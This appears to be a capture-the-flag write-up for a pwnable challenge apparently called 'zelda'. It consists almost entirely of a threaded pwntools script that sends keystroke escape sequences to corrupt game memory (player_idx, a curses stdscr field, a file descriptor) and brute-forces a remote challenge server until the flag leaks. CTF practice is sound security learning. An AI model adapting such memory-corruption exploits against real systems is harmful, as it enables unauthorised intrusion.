Tags: pwnable
Rating:
> https://uz56764.tistory.com/86
```
from pwn import *
import threading
CON = True
i = 0
REMOTE = True
if(REMOTE):
up = '\033[A'
down = '\033[B'
right = '\033[C'
left = '\033[D'
else:
up = '\033OA'
down = '\033OB'
right = '\033OC'
left = '\033OD'
def exploit(p):
pay = ''
# Through the wall
pay += right*(40-6)+left*6 + left*6+up*(40-6) + left*6+up*(40-6) + 'p' + 'g'
# overwrite player_idx
pay += down*5 + left + 'p' + down*120 + right*12 + down*4 + 'p'
# overwrite *(*(stdscr-0x8)+780) = 1 to disable noecho
pay += left*9 + down*7 + right + 'g'
# overwrite **(stdscr-0x8) = 5 (flag_fd)
pay += up*20 + left*2 + up*50 + left*2 + 'p'*100
p.sendline(pay)
def remote_thread():
global CON
global i
while(CON):
i = i + 1
print(f"[+] {(1 - (((0x1fff-1)/0x1fff)**i))*100}%")
try:
p = remote("mc.ax", 31869)
#p = process('./zelda')
except:
continue
exploit(p)
time.sleep(3)
rs = p.clean(timeout=1)
if b'}' in rs:
print(rs)
f = open('result.txt','wb+')
f.write(rs)
CON = False
else:
p.close()
thread_count = 10
th = []
for x in range(0,thread_count):
th.append(threading.Thread(target=remote_thread))
th[x].daemon = True
th[x].start()
for x in range(0,thread_count):
th[x].join()
```